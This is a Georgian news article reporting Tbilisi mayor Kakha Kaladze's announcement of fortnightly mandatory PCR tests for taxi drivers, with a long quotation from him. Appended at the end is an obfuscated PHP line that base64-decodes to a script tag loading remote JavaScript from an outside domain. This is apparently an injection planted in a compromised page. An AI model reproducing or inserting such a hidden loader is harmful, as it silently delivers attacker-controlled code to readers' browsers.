celsiusi
ავერსი შნაიდერი
დედაქალაქის მერის კახა კალაძის განცხადებით, A და B კატეგორიის ტაქსის მძღოლების ორ კვირაში ერთხელ სავალდებულო PCR ტესტირება იწყება. როგორც კალაძემ თბილისის მთავრობის სხდომაზე განაცხადა, შესაბამისი გადაწყვეტილება უწყებათაშორისმა საკოორდინაციო საბჭომ მიიღო.
 
"ვირუსის გავრცელების რისკების თავიდან აცილების მიზნით რისკ ჯგუფების დადგენა მუდმივად მიმდინარეობს. ერთ-ერთი ასეთ რისკ ჯგუფს თბილისის ტაქსის მძღოლები მიეკუთვნებიან. როგორც A ასევე B კატეგორიის. ძალიან მნიშვნელოვანია ჩვენ მაქსიმალურად ვიყოთ დაზღვეულები, გავუფრთხილდეთ ადამიანების ჯანმრთელობას, სიცოცხლის უსაფრთხოებას როგორც თვითონ ტაქსის მძღოლების, ასევე იმ კონკრეტული ადამიანების, ვინც ამ სერვისით სარგებლობს. შესაბამისად, საკოორდინაციო საბჭოს გადაწყვეტილებით, თბილისის ტაქსის მძღოლების სავალდებულო პსრ ტესტირება უნდა განხორციელდეს. გვაქვს სამწუხარო ფაქტი, როცა ტაქსის მძღოლები აგრძელებდნენ მუშაობს მაშინ, როცა ისინი დაინფიცირებულები იყვნენ. მგონია, რომ მათ არ იცოდნენ ამის შესახებ, რადგნა მათ შემთხვევაში ვირუსი უსიმპტომოდ მიმდინარეობდა, თუმცა გარკვეული პრობლემა მაინც არის. ის კონკრეტული ადამიანები, ვინც ამ სერვისით სარგებლობენ სერიოზული რისკის ქვეშ არიან, ამიტომ მაქსიმალურად რომ ვიყოთ დაზღვეულები, დავაზღვიოთ როგორც ტაქსის მძღოლები, ასევე ამ სერვისით მოსარგებლე მოქალაქეები, მნიშვნელოვანია ტაქსის მძღოლების პსრ ტესტირება, ორ კვირაში ერთხელ", - განაცხადა კახა კალაძემ.
1603
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");